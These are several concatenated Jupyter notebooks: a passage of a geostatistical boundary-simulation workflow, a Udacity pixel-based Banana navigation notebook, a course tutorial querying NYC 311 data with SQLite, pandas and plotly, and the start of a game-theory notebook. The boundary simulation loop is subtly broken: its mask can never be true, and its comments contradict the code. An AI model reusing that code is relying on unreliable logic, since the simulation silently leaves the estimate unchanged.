print('Proportion of inside data: %.3f'%(proportion))
variance = proportion - proportion**2
# Perform data spacing analysis
dat.spacing(n_nearest=1)
lag_length = dat['Data Spacing (m)'].values.mean()
print('average data spacing in XY plane: {:.3f} {}'.format(lag_length,
gs.Parameters['plotting.unit']))
mean_range = (np.ptp(dat[dat.x].values) + np.ptp(dat[dat.y].values)) * 0.5
n_lag = np.ceil((mean_range * 0.5) / lag_length)
lag_tol = lag_length * 0.6
var_calc = gs.Program(program=exe_dir+'varcalc')
parstr = """ Parameters for VARCALC
**********************
START OF PARAMETERS:
{file} -file with data
2 3 0 - columns for X, Y, Z coordinates
1 4 - number of variables,column numbers (position used for tail,head variables below)
{t_min} 1.0e21 - trimming limits
{n_directions} -number of directions
0.0 90 1000 0.0 22.5 1000 0.0 -Dir 01: azm,azmtol,bandhorz,dip,diptol,bandvert,tilt
{n_lag} {lag_length} {lag_tol} - number of lags,lag distance,lag tolerance
{output} -file for experimental variogram points output.
0 -legacy output (0=no, 1=write out gamv2004 format)
1 -run checks for common errors
1 -standardize sills? (0=no, 1=yes)
1 -number of variogram types
1 1 10 1 {variance} -tail variable, head variable, variogram type (and cutoff/category), sill
"""
n_directions = 1
varcalc_outfl = os.path.join(outdir, 'varcalc.out')
var_calc.run(parstr=parstr.format(file=dat.flname,
n_directions = n_directions,
t_min = gs.Parameters['data.tmin'],
n_lag=n_lag,
lag_length = lag_length,
lag_tol = lag_tol,
variance = variance,
output=varcalc_outfl),
liveoutput=True)
varfl = gs.DataFile(varcalc_outfl)
varfl.head()
var_model = gs.Program(program=exe_dir+'varmodel')
parstr = """ Parameters for VARMODEL
***********************
START OF PARAMETERS:
{varmodel_outfl} -file for modeled variogram points output
1 -number of directions to model points along
0.0 0.0 100 6 - azm, dip, npoints, point separation
2 0.05 -nst, nugget effect
1 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
1 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
1 100000 -fit model (0=no, 1=yes), maximum iterations
1.0 - variogram sill (can be fit, but not recommended in most cases)
1 - number of experimental files to use
{varcalc_outfl} - experimental output file 1
1 1 - # of variograms (<=0 for all), variogram #s
1 0 10 - # pairs weighting, inverse distance weighting, min pairs
0 10.0 - fix Hmax/Vert anis. (0=no, 1=yes)
0 1.0 - fix Hmin/Hmax anis. (0=no, 1=yes)
{varmodelfit_outfl} - file to save fit variogram model
"""
varmodel_outfl = os.path.join(outdir, 'varmodel.out')
varmodelfit_outfl = os.path.join(outdir, 'varmodelfit.out')
var_model.run(parstr=parstr.format(varmodel_outfl= varmodel_outfl,
varmodelfit_outfl = varmodelfit_outfl,
varcalc_outfl = varcalc_outfl), liveoutput=False, quiet=True)
varmdl = gs.DataFile(varmodel_outfl)
varmdl.head()
ax = gs.variogram_plot(varfl, index=1, color='b', grid=True, label = 'Indicator Variogram (Experimental)')
gs.variogram_plot(varmdl, index=1, ax=ax, color='b', experimental=False, label = 'Indicator Variogram (Model)')
_ = ax.legend(fontsize=12)
```
## 4. Calculate and model the Gaussian Variogram
The Gaussian variogram that yields the indicator variogram after truncation of a Gaussian random field is calculated. This Gaussian variogram is modeled and input to $df$ modeing.
#### Calculate the Gaussian variogram
The bigaus2 program applies the Gaussian integration method, given the indicator variogram and the proportion of the indicator.
```
bigaus2 = gs.Program(exe_dir+'bigaus2')
parstr = """ Parameters for BIGAUS2
**********************
START OF PARAMETERS:
1 -input mode (1) model or (2) variogram file
nofile.out -file for input variogram
{proportion} -threshold/proportion
2 -calculation mode (1) NS->Ind or (2) Ind->NS
{outfl} -file for output of variograms
1 -number of thresholds
{proportion} -threshold cdf values
1 {n_lag} -number of directions and lags
0 0.0 {lag_length} -azm(1), dip(1), lag(1)
{varstr}
"""
with open(varmodelfit_outfl, 'r') as f:
varmodel_ = f.readlines()
varstr = ''''''
for line in varmodel_:
varstr += line
pars = dict(proportion=proportion,
lag_length=lag_length,
n_lag=n_lag,
outfl= os.path.join(outdir, 'bigaus2.out'),
varstr=varstr)
bigaus2.run(parstr=parstr.format(**pars), nogetarg=True)
```
### Data manipulation to handle an odd data format
The bigaus2 program outputs an odd (legacyish) variogram format, which must be translated to the standard Variogram format.
```
# Read in the data before demonstrating its present form
expvargs = gs.readvarg(os.path.join(outdir, 'bigaus2.out'), 'all')
expvargs.head()
varclac_gaussian = gs.DataFile(data = varfl.data[:-1].copy(), flname=os.path.join(outdir,'gaussian_exp_variogram.out'))
varclac_gaussian['Lag Distance'] = expvargs['Distance']
varclac_gaussian['Variogram Value'] = expvargs['Value']
varclac_gaussian.write_file(varclac_gaussian.flname)
varclac_gaussian.head()
```
### Gaussian variogram modeling
This model is input to distance function estimation.
```
parstr = """ Parameters for VARMODEL
***********************
START OF PARAMETERS:
{varmodel_outfl} -file for modeled variogram points output
1 -number of directions to model points along
0.0 0.0 100 6 - azm, dip, npoints, point separation
2 0.01 -nst, nugget effect
3 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
3 ? 0.0 0.0 0.0 -it,cc,azm,dip,tilt (ang1,ang2,ang3)
? ? ? -a_hmax, a_hmin, a_vert (ranges)
1 100000 -fit model (0=no, 1=yes), maximum iterations
1.0 - variogram sill (can be fit, but not recommended in most cases)
1 - number of experimental files to use
{varcalc_outfl} - experimental output file 1
1 1 - # of variograms (<=0 for all), variogram #s
1 0 10 - # pairs weighting, inverse distance weighting, min pairs
0 10.0 - fix Hmax/Vert anis. (0=no, 1=yes)
0 1.0 - fix Hmin/Hmax anis. (0=no, 1=yes)
{varmodelfit_outfl} - file to save fit variogram model
"""
varmodel_outfl_g = os.path.join(outdir, 'varmodel_g.out')
varmodelfit_outfl_g = os.path.join(outdir, 'varmodelfit_g.out')
var_model.run(parstr=parstr.format(varmodel_outfl= varmodel_outfl_g,
varmodelfit_outfl = varmodelfit_outfl_g,
varcalc_outfl = varclac_gaussian.flname), liveoutput=True, quiet=False)
varmdl_g = gs.DataFile(varmodel_outfl_g)
varmdl_g.head()
fig, axes = plt.subplots(1, 2, figsize= (15,4))
ax = axes[0]
ax = gs.variogram_plot(varfl, index=1, ax=ax, color='b', grid=True, label = 'Indicator Variogram (Experimental)')
gs.variogram_plot(varmdl, index=1, ax=ax, color='b', experimental=False, label = 'Indicator Variogram (Model)')
_ = ax.legend(fontsize=12)
ax = axes[1]
gs.variogram_plot(varclac_gaussian, index=1, ax=ax, color='g', grid=True, label = 'Gaussian Variogram (Experimental)')
gs.variogram_plot(varmdl_g, index=1, ax=ax, color='g', experimental=False, label = 'Gaussian Variogram (Model)')
_ = ax.legend(fontsize=12)
```
## 5. Distance Function $df$ Modeling
The $df$ is calculated at the data locations, before being estimated at the grid locations. The $c$ parameter is applied to the $df$ calculation, defining the bandwidth of uncertainty that will be simulated in the next section.
### Determine the $c$ parameter
Normally the optimal $c$ would be calculated using a jackknife study, but it is simply provided here.
```
selected_c = 200
```
### Calculate the $df$ at the data locations
```
dfcalc = gs.Program(exe_dir+'dfcalc')
# Print the columns for populating the parameter file without variables
print(dat.columns)
parstr = """ Parameters for DFCalc
*********************
START OF PARAMETERS:
{datafl} -file with input data
1 2 3 0 4 -column for DH,X,Y,Z,Ind
1 -in code: indicator for inside domain
0.0 0.0 0.0 -angles for anisotropy ellipsoid
1.0 1.0 -first and second anisotropy ratios (typically <=1)
0 -proportion of drillholes to remove
696969 -random number seed
{c} -C
{outfl} -file for distance function output
'nofile.out' -file for excluded drillholes output
"""
pars = dict(datafl=dat.flname, c=selected_c,
outfl=os.path.join(outdir,'df_calc.out'))
dfcalc.run(parstr=parstr.format(**pars))
```
### Manipulate the $df$ data before plotting
A standard naming convention of the distance function variable is used for convenience in the workflow, motivating the manipulation.
```
# Load the data and note the abbreviated name of the distance function
dat_df = gs.DataFile(os.path.join(outdir,'df_calc.out'), notvariables='Ind', griddef=gs.Parameters['data.griddef'])
print('Initial distance Function variable name = ', dat_df.variables)
# Set a standard distance function name
dfvar = 'Distance Function'
dat_df.rename({dat_df.variables:dfvar})
print('Distance Function variable name = ', dat_df.variables)
# Set symmetric color limits for the distance function
df_vlim = (-350, 350)
gs.location_plot(dat_df, vlim=df_vlim, cbar_label='m')
```
### Estimate the $df$ across the grid
Kriging is performed with a large number of data to provide a smooth and conditionally unbiased estimate. Global kriging would also be appropriate.
```
kd3dn = gs.Program(exe_dir+'kt3dn')
varmodelfit_outfl_g
parstr = """ Parameters for KT3DN
********************
START OF PARAMETERS:
{input_file} -file with data
1 2 3 0 6 0 - columns for DH,X,Y,Z,var,sec var
-998.0 1.0e21 - trimming limits
0 -option: 0=grid, 1=cross, 2=jackknife
xvk.dat -file with jackknife data
1 2 0 3 0 - columns for X,Y,Z,vr and sec var
nofile.out -data spacing analysis output file (see note)
0 15.0 - number to search (0 for no dataspacing analysis, rec. 10 or 20) and composite length
0 100 0 -debugging level: 0,3,5,10; max data for GSKV;output total weight of each data?(0=no,1=yes)
{out_sum} -file for debugging output (see note)
{out_grid} -file for kriged output (see GSB note)
{gridstr}
1 1 1 -x,y and z block discretization
1 100 100 1 -min, max data for kriging,upper max for ASO,ASO incr
0 0 -max per octant, max per drillhole (0-> not used)
700.0 700.0 500.0 -maximum search radii
0.0 0.0 0.0 -angles for search ellipsoid
1 -0=SK,1=OK,2=LVM(resid),3=LVM((1-w)*m(u))),4=colo,5=exdrift,6=ICCK
0.0 0.6 0.8 1.6 - mean (if 0,4,5,6), corr. (if 4 or 6), var. reduction factor (if 4)
0 0 0 0 0 0 0 0 0 -drift: x,y,z,xx,yy,zz,xy,xz,zy
0 -0, variable; 1, estimate trend
extdrift.out -gridded file with drift/mean
4 - column number in gridded file
keyout.out -gridded file with keyout (see note)
0 1 - column (0 if no keyout) and value to keep
{varmodelstr}
"""
with open(varmodelfit_outfl_g, 'r') as f:
varmodel_ = f.readlines()
varstr = ''''''
for line in varmodel_:
varstr += line
pars = dict(input_file=os.path.join(outdir,'df_calc.out'),
out_grid=os.path.join(outdir,'kt3dn_df.out'),
out_sum=os.path.join(outdir,'kt3dn_sum.out'),
gridstr=gs.Parameters['data.griddef'], varmodelstr=varstr)
kd3dn.run(parstr=parstr.format(**pars))
```
### Manipulate and plot the $df$ estimate
pixelplt selects pointvar as the color of the overlain dat_df point data since its name matches the column name of est_df.
```
est_df = gs.DataFile(os.path.join(outdir,'kt3dn_df.out'))
# Drop the variance since we won't be using it,
# allowing for specification of the column to be avoided
est_df.drop('EstimationVariance')
# Rename to the standard distance function name for convenience
est_df.rename({est_df.variables:dfvar})
est_df.describe()
# Generate a figure object
fig, axes = gs.subplots(1, 2, figsize=(10, 8),cbar_mode='each',
axes_pad=0.8, cbar_pad=0.1)
# Location map of indicator data for comparison
gs.location_plot(dat, ax=axes[0])
# Map of distance function data and estimate
gs.slice_plot(est_df, pointdata=dat_df,
pointkws={'edgecolors':'k', 's':25},
cbar_label='Distance Function (m)', vlim=df_vlim, ax=axes[1])
```
## 6. Boundary Simulation
This section is subdivided into 4 sub-sections:
1. Boot starp a value between -c and c using a uniform distribution
2. Transform this Gaussian deviate into $df$ deviates with a range of $[−C, C]$
3. Add the $df$ deviates to the $df$ estimate, yielding a $df$ realization
4. Truncate the realization at $df=0$ , generating a realization of the domain indicator
```
# Required package for this calculation
from scipy.stats import norm
# Create a directory for the output
domaindir = os.path.join(outdir, 'Domains/')
gs.mkdir(domaindir)
for real in range(nreal):
# Transform the Gaussian deviates to probabilities
sim = np.random.rand()
# Transform the probabilities to distance function deviates
sim = 2 *selected_c * sim - selected_c
# Initialize the final realization as the distance function estimate
df = est_df[dfvar].values
idx = np.logical_and(est_df[dfvar].values>selected_c, est_df[dfvar].values<selected_c)
# Add the distance function deviates to the distance function estimate,
# yielding a distance function realization
df[idx] = df[idx] + sim
# If the distance function is greater than 0, the simulated indicator is 1
sim = (df <= 0).astype(int)
# Convert the Numpy array to a Pandas DataFrame, which is required
# for initializing a DataFile (aside from the demonstrated flname approach).
# The DataFile is then written out
sim = pd.DataFrame(data=sim, columns=[dat.cat])
sim = gs.DataFile(data=sim)
sim.write_file(domaindir+'real{}.out'.format(real+1))
```
### Plot the realizations
```
fig, axes = gs.subplots(2, 3, figsize=(15, 8), cbar_mode='single')
for real, ax in enumerate(axes):
sim = gs.DataFile(domaindir+'real{}.out'.format(real+1))
gs.slice_plot(sim, title='Realization {}'.format(real+1),
pointdata=dat,
pointkws={'edgecolors':'k', 's':25},
vlim=(0, 1), ax=ax)
```
## 7. Save project settings and clean the output directory
```
gs.Parameters.save('Parameters.json')
gs.rmdir(outdir) #command to delete generated data file
gs.rmfile('temp')
```
| github_jupyter |
# Navigation
---
Congratulations for completing the first project of the [Deep Reinforcement Learning Nanodegree](https://www.udacity.com/course/deep-reinforcement-learning-nanodegree--nd893)! In this notebook, you will learn how to control an agent in a more challenging environment, where it can learn directly from raw pixels! **Note that this exercise is optional!**
### 1. Start the Environment
We begin by importing some necessary packages. If the code cell below returns an error, please revisit the project instructions to double-check that you have installed [Unity ML-Agents](https://github.com/Unity-Technologies/ml-agents/blob/master/docs/Installation.md) and [NumPy](http://www.numpy.org/).
```
from unityagents import UnityEnvironment
import numpy as np
from collections import deque
import torch
import matplotlib.pyplot as plt
%matplotlib inline
from ddpg_agent_pixels import Agent
from sklearn.manifold import TSNE
```
Next, we will start the environment! **_Before running the code cell below_**, change the `file_name` parameter to match the location of the Unity environment that you downloaded.
- **Mac**: `"path/to/VisualBanana.app"`
- **Windows** (x86): `"path/to/VisualBanana_Windows_x86/Banana.exe"`
- **Windows** (x86_64): `"path/to/VisualBanana_Windows_x86_64/Banana.exe"`
- **Linux** (x86): `"path/to/VisualBanana_Linux/Banana.x86"`
- **Linux** (x86_64): `"path/to/VisualBanana_Linux/Banana.x86_64"`
- **Linux** (x86, headless): `"path/to/VisualBanana_Linux_NoVis/Banana.x86"`
- **Linux** (x86_64, headless): `"path/to/VisualBanana_Linux_NoVis/Banana.x86_64"`
For instance, if you are using a Mac, then you downloaded `VisualBanana.app`. If this file is in the same folder as the notebook, then the line below should appear as follows:
```
env = UnityEnvironment(file_name="VisualBanana.app")
```
```
env = UnityEnvironment(file_name=".\Banana_Windows_x86_64\Banana.exe")
```
Environments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.
```
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
```
### 2. Examine the State and Action Spaces
The simulation contains a single agent that navigates a large environment. At each time step, it has four actions at its disposal:
- `0` - walk forward
- `1` - walk backward
- `2` - turn left
- `3` - turn right
The environment state is an array of raw pixels with shape `(1, 84, 84, 3)`. *Note that this code differs from the notebook for the project, where we are grabbing **`visual_observations`** (the raw pixels) instead of **`vector_observations`**.* A reward of `+1` is provided for collecting a yellow banana, and a reward of `-1` is provided for collecting a blue banana.
Run the code cell below to print some information about the environment.
```
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents in the environment
print('Number of agents:', len(env_info.agents))
# number of actions
action_size = brain.vector_action_space_size
print('Number of actions:', action_size)
# examine the state space
state = env_info.visual_observations[0]
print('States look like:')
plt.imshow(np.squeeze(state))
plt.show()
state_size = state.shape
print('States have shape:', state.shape)
```
### 3. Take Random Actions in the Environment
In the next code cell, you will learn how to use the Python API to control the agent and receive feedback from the environment.
Once this cell is executed, you will watch the agent's performance, if it selects an action (uniformly) at random with each time step. A window should pop up that allows you to observe the agent, as it moves through the environment.
Of course, you'll have to change the code so that the agent is able to use its experience to gradually choose better actions when interacting with the environment!
```
env_info = env.reset(train_mode=False)[brain_name] # reset the environment
state = env_info.visual_observations[0] # get the current state
score = 0 # initialize the score
while True:
action = np.random.randint(action_size) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.visual_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("Score: {}".format(score))
```
When finished, you can close the environment.
```
env.close()
```
### 4. It's Your Turn!
Now it's your turn to train your own agent to solve the environment! When training the environment, set `train_mode=True`, so that the line for resetting the environment looks like the following:
```python
env_info = env.reset(train_mode=True)[brain_name]
```
| github_jupyter |
# CSE 6040, Fall 2015 [10]: A Large-Data Workflow
This notebook derives from an [awesome demo by the makers of plot.ly](https://plot.ly/ipython-notebooks/big-data-analytics-with-pandas-and-sqlite/).
In particular, this notebook starts with a large database of complaints filed by residents of New York City since 2010 via 311 calls. The full dataset is available at the [NYC open data portal](https://nycopendata.socrata.com/data). At about 6 GB and 10 million complaints, you can infer that a) you might not want to read it all into memory at once, and b) NYC residents are really whiny. (OK, maybe you should only make conclusion "a".) The notebook then combines the use of `sqlite`, `pandas`, and [`Plotly`](https://plot.ly/python/) to build _interactive_ visualizations. So it's a great way to exercise several of the things we've learned so far in our course!
## Getting started
To complete this notebook, you'll need to get your environment set up. The basic steps are:
1. Set up `plotly`.
2. Download the sample dataset.
**Set up `plotly`.** To do the interactive visualization part of this notebook, you'll need to install `plotly` and sign up for an online `plotly` account. From the command-line on your system, you can do this by running:
pip install plotly
From within this notebook, you might also be able to accomplish the same thing by running the following inside the notebook.
> The following example is for a default Mac OS X install of Anaconda; you may need to edit it for other systems.
```
!pip install plotly
```
The `plotly` service requires access to their servers.
To get started, you will need to sign up for a `plotly` account, if you haven't done so already, at:
https://plot.ly/
It's free! Well, to the extent that any too-good-to-be-true web service is "free."
Once you've done that, figure out what your API key is by visiting:
https://plot.ly/settings/api
Lastly, sign into the `plotly` servers from within your notebook as follows.
> Please modify this code to use your own username and API key.
```
import plotly.plotly as py
py.sign_in ('USERNAME', 'APIKEY')
```
Next, as a quick test let's make a simple plot using the "baby names" data set from [Lab 8](http://nbviewer.ipython.org/github/rvuduc/cse6040-ipynbs/blob/master/08--pandas-seaborn.ipynb).
```
import pandas as pd
# Build a Pandas data frame
names = ['Bob','Jessica','Mary','John','Mel']
births = [968, 155, 77, 578, 973]
BabyDataSet = zip (names, births)
df = pd.DataFrame(data=BabyDataSet, columns=['Names', 'Births'])
df
# Plot, using `plotly`
from plotly.graph_objs import Bar
plot_data = [Bar (x=df.Names, y=df.Births)]
py.iplot (plot_data)
```
**Download a sample dataset.** Next, grab a copy of today's dataset, which is a small (~ 20%) subset of the full dataset:
* [SQLite DB, ~ 257 MiB] http://cse6040.gatech.edu/fa15/NYC-311-2M.db
Connect to this database as you did in the [last lab](http://nbviewer.ipython.org/github/rvuduc/cse6040-ipynbs/blob/master/09--sqlite3.ipynb).
```
# SQLite database filename
DB_FILENAME = 'NYC-311-2M.db'
# Connect
import sqlite3 as db
disk_engine = db.connect (DB_FILENAME)
```
**Preview the data.** This sample database has just a single table, named `data`. Let's query it and see how long it takes to read. To carry out the query, we will use the SQL reader built into `pandas`.
```
import time
print ("Reading ...")
start_time = time.time ()
# Perform SQL query through the disk_engine connection.
# The return value is a pandas data frame.
df = pd.read_sql_query('SELECT * FROM data', disk_engine)
elapsed_time = time.time () - start_time
print ("==> Took %g seconds." % elapsed_time)
# Dump the first few rows
df.head()
```
## More SQL stuff
**Partial queries: `LIMIT` clause.** The preceding command was overkill for what we wanted, which was just to preview the table. Instead, we could have used the `LIMIT` option to ask for just a few results.
```
query = '''
SELECT *
FROM data
LIMIT 5
'''
start_time = time.time ()
df = pd.read_sql_query(query, disk_engine)
elapsed_time = time.time () - start_time
print ("==> LIMIT version took %g seconds." % elapsed_time)
df
```
**Set membership: `IN` operator.** Another common idiom is to ask for rows whose attributes fall within a set, for which you can use the `IN` operator.
```
query = '''
SELECT ComplaintType, Descriptor, Agency
FROM data
WHERE Agency IN ("NYPD", "DOB")
LIMIT 10
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
```
**Finding unique values: `DISTINCT` qualifier.** Yet another common idiom is to ask for the unique values of some attribute, for which you can use the `DISTINCT` qualifier.
```
query = 'SELECT DISTINCT City FROM data'
df = pd.read_sql_query(query, disk_engine)
print ("Found %d unique cities. The first few are:" % len (df))
df.head()
```
**Renaming columns: `AS` operator.** Sometimes you might want to rename a result column. For instance, the following query counts the number of complaints by "Agency," using the `COUNT(*)` function and `GROUP BY` clause, which we discussed in an earlier lab. If you wish to refer to the counts column of the resulting data frame, you can give it a more "friendly" name using the `AS` operator.
```
query = '''
SELECT Agency, COUNT(*) AS NumComplaints
FROM data
GROUP BY Agency
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
```
**Ordering results: `ORDER` clause.** You can also order the results. For instance, suppose we want to execute the previous query by number of complaints.
```
query = '''
SELECT Agency, COUNT(*) as NumComplaints
FROM data
GROUP BY Agency
ORDER BY NumComplaints
'''
df = pd.read_sql_query (query, disk_engine)
df.tail ()
```
Note that the above example prints the bottom (tail) of the data frame. You could have also asked for the query results in reverse (descending) order, by prefixing the `ORDER BY` attribute with a `-` (minus) symbol.
```
query = '''
SELECT Agency, COUNT(*) as NumComplaints
FROM data
GROUP BY Agency
ORDER BY -NumComplaints
'''
df = pd.read_sql_query (query, disk_engine)
df.head ()
```
And of course we can plot all of this data!
```
py.iplot ([Bar (x=df.Agency, y=df.NumComplaints)],
filename='311/most common complaints by city')
```
**Exercise.** Create a `pandas` data frame that shows the number of complaints for each type, in descending order. What is the most common type of complaint?
```
# Insert your answer here
```
Let's also visualize the result, as a bar chart showing complaint types on the x-axis and the number of complaints on the y-axis. If necessary, modify the `plotly` command below to pull the correct columns from your data frame.
```
py.iplot({
'data': [Bar (x=df.ComplaintType, y=df.NumComplaints)],
'layout': {
'margin': {'b': 150}, # Make the bottom margin a bit bigger to handle the long text
'xaxis': {'tickangle': 40}} # Angle the labels a bit
}, filename='311/most common complaints by complaint type')
```
**Exercise.** Determine the Top 10 whiniest cities. (That is, the 10 cities with the largest numbers of complaints.)
```
# Insert your answer here
query = '''
'''
df = pd.read_sql_query (query, disk_engine)
df.head (10)
```
You should notice two bits of funny behavior, namely, that cities are treated in a _case-sensitive_ manner and that `None` appears as a city. (Presumably this setting occurs when a complaint is non-localized or the city is not otherwise specified.)
**Case-insensitive grouping: `COLLATE NOCASE`.** One way to carry out the preceding query in a case-insensitive way is to add a `COLLATE NOCASE` qualifier to the `GROUP BY` clause.
Let's filter out the 'None' cases as well, while we are at it.
```
query = '''
SELECT City, COUNT(*) AS NumComplaints
FROM data
WHERE City <> 'None'
GROUP BY City COLLATE NOCASE
ORDER BY -NumComplaints
LIMIT 10
'''
df = pd.read_sql_query (query, disk_engine)
df
```
Brooklyn is NYC's whiniest city. I knew it!
Lastly, for later use, let's save the names of just the top 7 cities.
```
TOP_CITIES = df.head (7)['City']
TOP_CITIES
```
## Multiple series in `plotly`
Here is another example of how to use a query to extract data and then recombine the results into a plot.
Suppose we want to look at the number of complaints by type _and_ by city.
Furthermore, suppose we want to render these results as a bar chart with "complaints" along the x-axis and cumulative counts, as stacked bars, along the y-axis, where different bars correspond to different cities. The `plotly` package requires that we create a list of _traces_, where each trace is a series to plot.
Here's how we might construct such a list of traces.
```
traces = []
for city in TOP_CITIES:
query = '''
SELECT ComplaintType, COUNT(*) as NumComplaints
FROM data
WHERE City = "{}" COLLATE NOCASE
GROUP BY ComplaintType
ORDER BY -NumComplaints
'''.format (city)
df = pd.read_sql_query (query, disk_engine)
traces.append (Bar (x=df['ComplaintType'],
y=df.NumComplaints,
name=city.capitalize()))
```
From this list, we can create the stacked bar chart accordingly.
```
from plotly.graph_objs import Layout
py.iplot({'data': traces,
'layout': Layout (barmode='stack',
xaxis={'tickangle': 40},
margin={'b': 150})},
filename='311/complaints by city stacked')
```
*You can also `click` on the legend entries to hide/show the traces. Click-and-drag to zoom in and shift-drag to pan.*
**Exercise.** Make a variation of the above stacked bar chart that shows, for each complaint type (x-axis), the _percentage_ of complaints attributed to each city.
Your code should create a new list of traces, `norm_traces`, which the `plotly` code below can then render as the final result.
```
py.iplot({'data': norm_traces,
'layout': Layout(
barmode='stack',
xaxis={'tickangle': 40, 'autorange': False, 'range': [-0.5, 16]},
yaxis={'title': 'Percent of Complaints by City'},
margin={'b': 150},
title='Relative Number of 311 Complaints by City')
}, filename='311/relative complaints by city', validate=False)
```
From the above data, what would you conclude about the various areas of NY city?
### Part 2: SQLite time series with Pandas
###### Filter SQLite rows with timestamp strings: `YYYY-MM-DD hh:mm:ss`
```
query = '''
SELECT ComplaintType, CreatedDate, City
FROM data
WHERE CreatedDate < "2015-09-15 23:59:59"
AND CreatedDate > "2015-09-15 00:00:00"
'''
df = pd.read_sql_query (query, disk_engine)
df
```
###### Pull out the hour unit from timestamps with `strftime`
```
query = '''
SELECT CreatedDate, STRFTIME ('%H', CreatedDate) AS Hour, ComplaintType
FROM data
LIMIT 5
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
```
###### Count the number of complaints (rows) per hour with `STRFTIME`, `GROUP BY`, and `COUNT(*)`
```
query = '''
SELECT
CreatedDate,
strftime ('%H', CreatedDate) as Hour,
COUNT (*) AS `Complaints per Hour`
FROM data
GROUP BY Hour
'''
df = pd.read_sql_query (query, disk_engine)
df.head()
py.iplot({
'data': [Bar (x=df['Hour'], y=df['Complaints per Hour'])],
'layout': Layout (xaxis={'title': 'Hour in Day'},
yaxis={'title': 'Number of Complaints'})},
filename='311/complaints per hour')
```
###### Filter noise complaints by hour
```
query = '''
SELECT CreatedDate,
STRFTIME ('%H', CreatedDate) AS Hour,
COUNT (*) AS `Complaints per Hour`
FROM data
WHERE ComplaintType LIKE '%Noise%'
GROUP BY Hour
ORDER BY -`Complaints per Hour`
'''
df = pd.read_sql_query (query, disk_engine)
display (df.head(n=2))
py.iplot({
'data': [Bar(x=df['Hour'], y=df['Complaints per Hour'])],
'layout': Layout(xaxis={'title': 'Hour in Day'},
yaxis={'title': 'Number of Complaints'},
title='Number of Noise Complaints in NYC by Hour in Day'
)}, filename='311/noise complaints per hour')
```
###### Segregate complaints by hour
```
complaint_traces = {} # Each series in the graph will represent a complaint
complaint_traces['Other'] = {}
for hour in range(1, 24):
hour_str = '0'+str(hour) if hour < 10 else str(hour)
query = '''
SELECT CreatedDate,
ComplaintType,
STRFTIME ('%H', CreatedDate) AS Hour,
COUNT (*) AS NumComplaints
FROM data
WHERE Hour = "{}"
GROUP BY ComplaintType
ORDER BY -NumComplaints
'''.format (hour_str)
df = pd.read_sql_query (query, disk_engine)
complaint_traces['Other'][hour] = sum (df.NumComplaints)
# Grab the 7 most common complaints for that hour
for i in range(7):
complaint = df.get_value(i, 'ComplaintType')
count = df.get_value(i, 'NumComplaints')
complaint_traces['Other'][hour] -= count
if complaint in complaint_traces:
complaint_traces[complaint][hour] = count
else:
complaint_traces[complaint] = {hour: count}
traces = []
for complaint in complaint_traces:
traces.append({
'x': range(25),
'y': [complaint_traces[complaint].get(i, None) for i in range(25)],
'name': complaint,
'type': 'bar'
})
py.iplot({
'data': traces,
'layout': {
'barmode': 'stack',
'xaxis': {'title': 'Hour in Day'},
'yaxis': {'title': 'Number of Complaints'},
'title': 'The 7 Most Common 311 Complaints by Hour in a Day'
}}, filename='311/most common complaints by hour')
```
##### Aggregated time series
First, create a new column with timestamps rounded to the previous 15 minute interval
```
minutes = 15
seconds = minutes*60
query = '''
SELECT CreatedDate,
DATETIME ((STRFTIME ('%s', CreatedDate) / {seconds}) * {seconds},
'unixepoch')
AS Interval
FROM data
LIMIT 10
'''.format (seconds=seconds)
df = pd.read_sql_query (query, disk_engine)
display (df.head ())
```
Then, `GROUP BY` that interval and `COUNT(*)`
```
minutes = 15
seconds = minutes*60
query = '''
SELECT CreatedDate,
DATETIME ((STRFTIME ('%s', CreatedDate) / {seconds}) * {seconds},
'unixepoch')
AS Interval,
COUNT (*) AS `Complaints / Interval`
FROM data
GROUP BY Interval
ORDER BY Interval
LIMIT 500
'''.format (seconds=seconds)
df = pd.read_sql_query (query, disk_engine)
display (df.head ())
display (df.tail ())
py.iplot(
{
'data': [{
'x': df.Interval,
'y': df['Complaints / Interval'],
'type': 'bar'
}],
'layout': {
'title': 'Number of 311 Complaints per 15 Minutes'
}
}, filename='311/complaints per 15 minutes')
hours = 24
minutes = hours*60
seconds = minutes*60
query = '''
SELECT CreatedDate,
DATETIME ((STRFTIME ('%s', CreatedDate) / {seconds}) * {seconds},
'unixepoch')
AS Interval,
COUNT (*) AS `Complaints / Interval`
FROM data
GROUP BY Interval
ORDER BY Interval
LIMIT 500
'''.format (seconds=seconds)
df = pd.read_sql_query (query, disk_engine)
df.head ()
py.iplot(
{
'data': [{
'x': df.Interval,
'y': df['Complaints / Interval'],
'type': 'bar'
}],
'layout': {
'title': 'Number of 311 Complaints per Day'
}
}, filename='311/complaints per day')
```
### Learn more
- Find more open data sets on [Data.gov](https://data.gov) and [NYC Open Data](https://nycopendata.socrata.com)
- Learn how to setup [MySql with Pandas and Plotly](http://moderndata.plot.ly/graph-data-from-mysql-database-in-python/)
- Add [interactive widgets to IPython notebooks](http://moderndata.plot.ly/widgets-in-ipython-notebook-and-plotly/) for customized data exploration
- Big data workflows with [HDF5 and Pandas](http://stackoverflow.com/questions/14262433/large-data-work-flows-using-pandas)
- [Interactive graphing with Plotly](https://plot.ly/python/)
```
#from IPython.core.display import HTML
#import urllib2
#HTML(urllib2.urlopen('https://raw.githubusercontent.com/plotly/python-user-guide/css-updates/custom.css').read())
```
| github_jupyter |
```
import os
import sys
ngames_path = os.path.abspath(os.path.join(os.getcwd(), '../../..', 'ngames'))
sys.path.append(ngames_path)
import matplotlib.pyplot as plt
from extensivegames import ExtensiveFormGame, plot_game
from build import build_full_game
